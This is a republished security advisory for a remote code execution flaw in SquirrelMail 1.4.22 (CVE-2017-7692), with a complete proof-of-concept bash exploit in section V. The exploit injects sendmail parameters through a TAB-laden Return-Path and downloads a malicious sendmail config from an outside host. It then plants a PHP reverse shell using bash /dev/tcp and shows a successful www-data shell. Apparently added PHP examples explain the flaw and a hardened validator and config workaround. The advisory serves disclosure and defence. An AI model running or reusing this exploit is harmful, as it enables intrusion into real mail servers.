SquirrelMail 1.4.22 Remote Code Execution

Source: packetstormsecurity.com (PACKETSTORM:142266)
Author: Dawid Golunski
Published: 2017-04-23
EPSS: 0.975 (High), percentile 100.0%

  
__ __ __ __ __   
/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________  
/ / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/  
/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )   
/_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/   
/____/   
  
  
Follow @dawid_golunski  
  
  
  
~~~~~~~~~~~~ ExploitBox.io ~~~~~~~~~~~~~~~~  
Interested in security / vulns / exploits ?  
Check out the new project of the author of this advisory:  
  
ExploitBox.io  
A Playground & Labs for security folks into  
hacking & the art of exploitation  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
  
  
============================================  
- Author: Dawid Golunski  
- dawid[at]legalhackers.com  
- https://legalhackers.com  
  
- CVE-2017-7692  
- Release date: 22.04.2017  
- Revision 1.0  
- Severity: Critical  
=============================================  
  
  
I. VULNERABILITY  
-------------------------  
  
SquirrelMail <= 1.4.22 Remote Code Execution  
  
  
II. BACKGROUND  
-------------------------  
  
"  
SquirrelMail is a standards-based webmail package written in PHP.   
It includes built-in pure PHP support for the IMAP and SMTP protocols, and all  
pages render in pure HTML 4.0 (with no JavaScript required) for maximum   
compatibility across browsers. It has very few requirements and is very easy  
to configure and install. SquirrelMail has all the functionality you would   
want from an email client, including strong MIME support, address books, and  
folder manipulation."  
  
https://squirrelmail.org/about/  
  
III. INTRODUCTION  
-------------------------  
  
SquirrelMail is affected by a critical Remote Code Execution vulnerability  
which stems from insufficient escaping of user-supplied data when   
SquirrelMail has been configured with Sendmail as the main transport.  
An authenticated attacker may be able to exploit the vulnerability  
to execute arbitrary commands on the target and compromise the remote  
system.  
  
IV. DESCRIPTION  
-------------------------  
  
The vulnerability is similar to the following vulnerabilities previously discovered  
by the author of this advisory:  
  
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html  
  
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html  
  
  
When SquirrelMail has been configured with Sendmail as the delivery transport,  
it uses the following function to send out user emails:  
  
-----[ ./class/deliver/Deliver_SendMail.class.php ]-----  
  
    function initStream($message, $sendmail_path, $ignore=0, $ignore='', $ignore='', $ignore='', $ignore='', $ignore=false, $ignore='') {
        $rfc822_header = $message->rfc822_header;
        $from = $rfc822_header->from[0];
        $envelopefrom = trim($from->mailbox.'@'.$from->host);
        $envelopefrom = str_replace(array("\0","\n"),array('',''),$envelopefrom);
        // save executed command for future reference
        $this->sendmail_command = "$sendmail_path $this->sendmail_args -f$envelopefrom";
        // open process handle for writing
        $stream = popen(escapeshellcmd($this->sendmail_command), "w");
        return $stream;
    }
  
---------------------------------------------------------  
  
  
SquirrelMail allows authenticated users to set the envelope-from (Return-Path)  
address through the webmail interface.  
  
As can be seen above, the function calls str_replace() to sanitize this user  
input and prevent injection of additional parameters into the sendmail command.  
Unfortunately it strips only NUL and newline characters and does not take the  
\t (TAB) character into account. escapeshellcmd() does not escape whitespace,  
and the shell spawned by popen() splits its command line on tabs as well as  
spaces, so a TAB in the address can be used by attackers to inject additional  
parameters.  
  
  
If the attacker sets their email address (Return-Path) in the options to  
  
attacker@localhost -oQ/tmp/ -X/tmp/sqpoc  
  
(with the three parts separated by TAB characters) and then sends a new email,  
the sendmail program will be called with the following arguments:  
  
Arg no. 0 == [/usr/sbin/sendmail]  
Arg no. 1 == [-i]  
Arg no. 2 == [-t]  
Arg no. 3 == [-fattacker@localhost]  
Arg no. 4 == [-oQ/tmp/]  
Arg no. 5 == [-X/tmp/sqpoc]  
  
which will result in the /tmp/sqpoc file being created on disk with the email  
log (the -X parameter causes sendmail to save its debug/mail log into a file).  
  
  
As demonstrated by the PoC exploit below, the attacker can also inject the -C  
parameter to point sendmail at a malicious config file, uploaded beforehand as  
an email attachment, and thereby achieve arbitrary command execution.  
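To make the mechanism concrete, the following is an added example (it is not SquirrelMail's code and not part of the original advisory). It runs the advisory's Return-Path payload through the str_replace() filter shown above and through a strict validator, and models the shell's word splitting to show why the TAB character turns one address into the six sendmail arguments listed above. The function names are this example's own; the sendmail path and the -i -t arguments are taken from the argument dump.

```php
<?php
// Added example, not SquirrelMail's code. Contrasts the advisory's
// str_replace()-based filter with a strict envelope-from check and models
// how /bin/sh splits the resulting sendmail command line. Function names
// are this example's own; /usr/sbin/sendmail and "-i -t" mirror the
// argument dump in the advisory.

// Filter as used in initStream(): strips NUL and LF only, so TAB survives.
function weakEnvelopeFrom(string $addr): string
{
    return str_replace(["\0", "\n"], ['', ''], trim($addr));
}

// Hardened replacement (assumption: a conservative local-part@host grammar
// is acceptable for Return-Path). Whitespace of any kind, shell
// metacharacters and a leading '-' (which sendmail would read as an option)
// all fail the check, so the address can never grow into extra arguments.
function strictEnvelopeFrom(string $addr): ?string
{
    $addr = trim($addr);
    $re = '/\A[A-Za-z0-9._%+][A-Za-z0-9._%+-]*@[A-Za-z0-9][A-Za-z0-9.-]*\z/';
    if (!preg_match($re, $addr)) {
        return null;
    }
    return $addr;
}

// Approximation of /bin/sh word splitting for an unquoted command line:
// spaces and tabs both separate words. This is why escapeshellcmd() alone
// does not help: it escapes metacharacters but leaves whitespace untouched.
function shellWords(string $cmdline): array
{
    return preg_split('/[ \t]+/', trim($cmdline)) ?: [];
}

// Vulnerable construction, as in the advisory: user data interpolated into
// one string that popen() hands to the shell.
function vulnerableArgv(string $envelopeFrom): array
{
    $cmd = '/usr/sbin/sendmail -i -t -f' . weakEnvelopeFrom($envelopeFrom);
    return shellWords(escapeshellcmd($cmd));
}

// Hardened construction: validate first, then quote every argument with
// escapeshellarg() so nothing user-supplied is ever word-split. Returns
// null when the address is rejected (the caller should refuse to send).
// On PHP >= 7.4 an argv array can be passed to proc_open() instead, which
// avoids the shell entirely; escapeshellarg() is the portable route.
function hardenedCommand(string $envelopeFrom): ?string
{
    $from = strictEnvelopeFrom($envelopeFrom);
    if ($from === null) {
        return null;
    }
    $argv = ['/usr/sbin/sendmail', '-i', '-t', '-f' . $from];
    return implode(' ', array_map('escapeshellarg', $argv));
}

function demo(): array
{
    // Constructed sample input: the advisory's Return-Path payload with the
    // separators written as literal TAB characters.
    $benign  = 'alice@example.org';
    $payload = "attacker@localhost\t-oQ/tmp/\t-X/tmp/sqpoc";
    return [
        'benign_vulnerable'  => vulnerableArgv($benign),    // 4 words
        'payload_vulnerable' => vulnerableArgv($payload),   // 6 words: -oQ and -X injected
        'benign_hardened'    => hardenedCommand($benign),   // quoted command string
        'payload_hardened'   => hardenedCommand($payload),  // null: address rejected
    ];
}

if (PHP_SAPI === 'cli' && isset($argv[0]) && realpath($argv[0]) === __FILE__) {
    foreach (demo() as $name => $value) {
        echo $name, ': ', json_encode($value), PHP_EOL;
    }
}
```

Run with `php example.php`: the payload yields six words under the vulnerable construction (exactly the argument list in the advisory) and is rejected outright by the strict validator. The validation step matters even when escapeshellarg() is used, because a quoted argument beginning with '-' would still be parsed by sendmail as an option.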
  
  
V. PROOF OF CONCEPT EXPLOIT  
-------------------------  
  
  
-----[ SquirrelMail_RCE_exploit.sh ]------  
  
#!/bin/bash  
#  
int='\033[94m  
__ __ __ __ __   
/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________  
/ / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/  
/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )   
/_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/   
/____/   
  
SquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692)  
  
SquirrelMail_RCE_exploit.sh (ver. 1.0)  
  
Discovered and coded by   
  
Dawid Golunski (@dawid_golunski)  
https://legalhackers.com  
  
ExploitBox project:  
https://ExploitBox.io  
  
\033[0m'  
  
# Quick and messy PoC for SquirrelMail webmail application.  
# It contains payloads for 2 vectors:  
# * File Write  
# * RCE   
# It requires user credentials and that SquirrelMail uses   
# Sendmail method as email delivery transport  
#  
#  
# Full advisory URL:  
# https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html  
#  
# Tested on: # Ubuntu 16.04   
# squirrelmail package version:  
# 2:1.4.23~svn20120406-2ubuntu1.16.04.1   
#  
# Disclaimer:  
# For testing purposes only  
#  
#  
# -----------------------------------------------------------------  
#  
# Interested in vulns/exploitation?   
# Stay tuned for my new project - ExploitBox  
#   
# .;lc'   
# .,cdkkOOOko;.   
# .,lxxkkkkOOOO000Ol'   
# .':oxxxxxkkkkOOOO0000KK0x:'   
# .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.   
# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl.   
# '';ldxxxxxdc,. ,oOXXXNNNXd;,.   
# .ddc;,,:c;. ,c: .cxxc:;:ox:   
# .dxxxxo, ., ,kMMM0:. ., .lxxxxx:   
# .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx:   
# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx:   
# .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx:   
# .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx:   
# .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx:   
# .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx:   
# .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx:   
# .dxxxxxdl;. ., .. .;cdxxxxxx:   
# .dxxxxxxxxxdc,. 'cdkkxxxxxxxx:   
# .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,.   
# .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.   
# .':oxxxxxxxxx.ckkkkkkkkxl,.   
# .,cdxxxxx.ckkkkkxc.   
# .':odx.ckxl,.   
# .,.'.   
#  
# https://ExploitBox.io  
#  
# https://twitter.com/Exploit_Box  
#  
# -----------------------------------------------------------------  
  
sqspool="/var/spool/squirrelmail/attach/"  
  
echo -e "$int"  
#echo -e "\033[94m \nSquirrelMail - Remote Code Execution PoC Exploit (CVE-2017-7692) \n"  
#echo -e "SquirrelMail_RCE_exploit.sh (ver. 1.0)\n"  
#echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m\n\n"  
  
  
# Base URL  
if [ $# -ne 1 ]; then  
    echo -e "Usage: \n$0 SquirrelMail_URL"  
    echo -e "Example: \n$0 http://target/squirrelmail/ \n"  
  
    exit 2  
fi  
URL="$1"  
  
# Log in  
echo -e "\n[*] Enter SquirrelMail user credentials"  
read -p "user: " squser  
read -sp "pass: " sqpass  
  
echo -e "\n\n[*] Logging in to SquirrelMail at $URL"  
curl -s -D /tmp/sqdata -d"login_username=$squser&secretkey=$sqpass&js_autodetect_results=1&just_logged_in=1" $URL/src/redirect.php | grep -q incorrect  
if [ $? -eq 0 ]; then  
    echo "Invalid creds"  
    exit 2  
fi  
sessid="`cat /tmp/sqdata | grep SQMSESS | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"  
keyid="`cat /tmp/sqdata | grep key | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"  
  
  
# Prepare Sendmail cnf  
#  
# * The config will launch php via the following stanza:  
#   
# Mlocal, P=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,  
# T=DNS/RFC822/X-Unix,  
# A=php -- $u $h ${client_addr}  
#  
wget -q -O/tmp/smcnf-exp https://legalhackers.com/exploits/sendmail-exploit.cf  
  
# Upload config  
echo -e "\n\n[*] Uploading Sendmail config"  
token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/compose.php?mailbox=INBOX&startMessage=1" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `"  
attachid="`curl -H "Expect:" -s -b"SQMSESSID=$sessid; key=$keyid" -F"smtoken=$token" -F"send_to=$mail" -F"subject=attach" -F"body=test" -F"attachfile=@/tmp/smcnf-exp" -F"username=$squser" -F"attach=Add" $URL/src/compose.php | awk -F's:32' '{print $2}' | awk -F'"' '{print $2}' | tr -d '\n'`"  
if [ ${#attachid} -lt 32 ]; then  
    echo "Something went wrong. Failed to upload the sendmail file."  
    exit 2  
fi  
  
# Create Sendmail cmd string according to selected payload  
echo -e "\n\n[?] Select payload\n"  
# SELECT PAYLOAD  
echo "1 - File write (into /tmp/sqpoc)"  
echo "2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)"  
echo  
read -p "[1-2] " pchoice  
  
case $pchoice in  
    1) payload="$squser@localhost -oQ/tmp/ -X/tmp/sqpoc"  
       ;;  
  
    2) payload="$squser@localhost -oQ/tmp/ -C$sqspool/$attachid"  
       ;;  
esac  
  
if [ $pchoice -eq 2 ]; then  
    echo  
    read -p "Reverese shell IP: " reverse_ip  
    read -p "Reverese shell PORT: " reverse_port  
fi  
  
# Reverse shell code  
phprevsh="  
<?php   
\$cmd = \"/bin/bash -c 'bash -i >/dev/tcp/$reverse_ip/$reverse_port 0<&1 2>&1 & '\";  
file_put_contents(\"/tmp/cmd\", 'export PATH=\"\$PATH\" ; export TERM=vt100 ;' . \$cmd);  
system(\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\");  
?>"  
  
  
# Set sendmail params in user settings  
echo -e "\n[*] Injecting Sendmail command parameters"  
token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/options.php?optpage=personal" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `"  
curl -s -b"SQMSESSID=$sessid; key=$keyid" -d "smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit" --data-urlencode "new_email_address=$payload" "$URL/src/options.php?optpage=personal" | grep -q 'Success' 2>/dev/null  
if [ $? -ne 0 ]; then  
    echo "Failed to inject sendmail parameters"  
    exit 2  
fi  
  
# Send email which triggers the RCE vuln and runs phprevsh  
echo -e "\n[*] Sending the email to trigger the vuln"  
(sleep 2s && curl -s -D/tmp/sheaders -b"SQMSESSID=$sessid; key=$keyid" -d"smtoken=$token" -d"startMessage=1" -d"session=0" \  
-d"send_to=$squser@localhost" -d"subject=poc" --data-urlencode "body=$phprevsh" -d"send=Send" -d"username=$squser" $URL/src/compose.php) &  
  
if [ $pchoice -eq 2 ]; then  
    echo -e "\n[*] Waiting for shell on $reverse_ip port $reverse_port"  
    nc -vv -l -p $reverse_port  
else  
    echo -e "\n[*] The test file should have been written at /tmp/sqpoc"  
fi  
  
grep -q "302 Found" /tmp/sheaders  
if [ $? -eq 1 ]; then  
    echo "There was a problem with sending email"  
    exit 2  
fi  
  
  
# Done  
echo -e "\n[*] All done. Exiting"  
  
  
  
-------[ EOF ]--------  
  
  
  
Example run:  
~~~~~~~~~~~~  
  
$ ./SquirrelMail_RCE_exploit.sh http://xenial/squirrelmail/  
  
__ __ __ __ __   
/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________  
/ / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/  
/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )   
/_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/   
/____/   
  
SquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692)  
  
SquirrelMail_RCE_exploit.sh (ver. 1.0)  
  
Discovered and coded by   
  
Dawid Golunski (@dawid_golunski)  
https://legalhackers.com  
  
ExploitBox project:  
https://ExploitBox.io  
  
  
  
[*] Enter SquirrelMail user credentials  
user: attacker  
pass:   
  
[*] Logging in to SquirrelMail at http://xenial/squirrelmail/  
  
  
[*] Uploading Sendmail config  
  
  
[?] Select payload  
  
1 - File write (into /tmp/sqpoc)  
2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)  
  
[1-2] 2  
  
Reverese shell IP: 192.168.57.1  
Reverese shell PORT: 1337  
  
[*] Injecting Sendmail command parameters  
  
[*] Sending the email to trigger the vuln  
  
[*] Waiting for shell on 192.168.57.1 port 1337  
Listening on [0.0.0.0] (family 0, port 1337)  
Connection from [192.168.57.3] port 1337 [tcp/*] accepted (family 2, sport 60608)  
bash: cannot set terminal process group (12208): Inappropriate ioctl for device  
bash: no job control in this shell  
www-data@vulnsys:/tmp$ id   
id  
uid=33(www-data) gid=33(www-data) groups=33(www-data)  
www-data@vulnsys:/tmp$ dpkg -l | grep squirrelmail  
dpkg -l | grep squirrelmail  
ii squirrelmail 2:1.4.23~svn20120406-2ubuntu1.16.04.1 all Webmail for nuts  
www-data@vulnsys:/tmp$ exit  
exit  
exit  
  
[*] All done. Exiting  
  
  
Video PoC:  
~~~~~~~~~~~~  
  
https://legalhackers.com/videos/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html  
  
  
  
VI. BUSINESS IMPACT  
-------------------------  
  
A successful exploitation could let remote attackers gain access to the  
target server in the context of the web server account, which could  
lead to a full compromise of the web application.  
  
  
VII. SYSTEMS AFFECTED  
-------------------------  
  
The latest version, SquirrelMail 1.4.22, and all earlier versions are affected.  
  
VIII. SOLUTION / VENDOR RESPONSE  
-------------------------  
  
The vulnerability was first reported to the SquirrelMail vendor by the  
author of this advisory, which resulted in the CVE ID CVE-2017-5181 being  
issued on 4th January. The vendor requested more time due to personal issues.  
  
The vulnerability was, however, discovered and published in April by another  
researcher on the full-disclosure list, which triggered the release of this  
advisory without an official solution available.  
  
As a temporary solution, users can switch to the SMTP-based transport (as  
opposed to Sendmail).  
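As an added illustration of that workaround (not from the advisory), the relevant settings in SquirrelMail's config/config.php, assuming the standard variable names used by the 1.4 series; the SMTP host is a placeholder:

```php
<?php
// Added example, not part of the advisory. The weak setting beside the
// corrected one in SquirrelMail's config/config.php (variable names as used
// by the 1.4 series). Only one of the two stanzas belongs in a real config.

// Weak: Sendmail transport, the configuration under which CVE-2017-7692 is
// exploitable, because the envelope-from is interpolated into a shell
// command line built from $sendmail_path and $sendmail_args.
$useSendmail   = true;
$sendmail_path = '/usr/sbin/sendmail';
$sendmail_args = '-i -t';

// Corrected (temporary workaround from section VIII): deliver over SMTP
// instead, so no sendmail command line is built from user-controlled data.
$useSendmail       = false;
$smtpServerAddress = 'localhost';   // placeholder: your MTA's SMTP listener
$smtpPort          = 25;
```

Switching the transport removes the vulnerable code path but does not make an attacker-controlled Return-Path harmless in general, so the setting should be combined with the vendor fix once it is available.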
  
As advised by MITRE, this vulnerability should now be tracked under the  
new CVE ID, CVE-2017-7692.  
  
The vendor has been advised that the issue is now public. No response has  
been received yet.  
  
IX. REFERENCES  
-------------------------  
  
https://legalhackers.com  
  
https://ExploitBox.io  
  
This / CVE-2017-7692 advisory URL:  
https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html  
  
Video PoC exploit:  
https://legalhackers.com/videos/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html  
  
Exploit code:  
The simple PoC shown above is available here:  
https://legalhackers.com/exploits/CVE-2017-7692/SquirrelMail_RCE_exploit.sh  
https://legalhackers.com/exploits/sendmail-exploit.cnf  
  
CVE-2017-7692  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7692  
  
Vendor site:  
https://squirrelmail.org  
  
Related OSS-SECURITY /full-disclosure messages:  
http://seclists.org/fulldisclosure/2017/Apr/89  
http://www.openwall.com/lists/oss-security/2017/04/19/7  
  
  
  
Similar vulnerabilities discovered by the author (PHPMailer & SwiftMailer):  
  
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html  
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html  
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html  
  
  
X. CREDITS  
-------------------------  
  
The vulnerability was first discovered/reported by Dawid Golunski  
dawid (at) legalhackers (dot) com  
https://legalhackers.com  
  
Filippo Cavallarin, who also reported the vulnerability at a later date  
(see the oss-security thread referenced in section IX for details)  
  
  
XI. REVISION HISTORY  
-------------------------  
  
22.04.2017 - Advisory released  
  
  
XII. LEGAL NOTICES  
-------------------------  
  
The information contained within this advisory is supplied "as-is" with  
no warranties or guarantees of fitness of use or otherwise. I accept no  
responsibility for any damage caused by the use or misuse of this information.  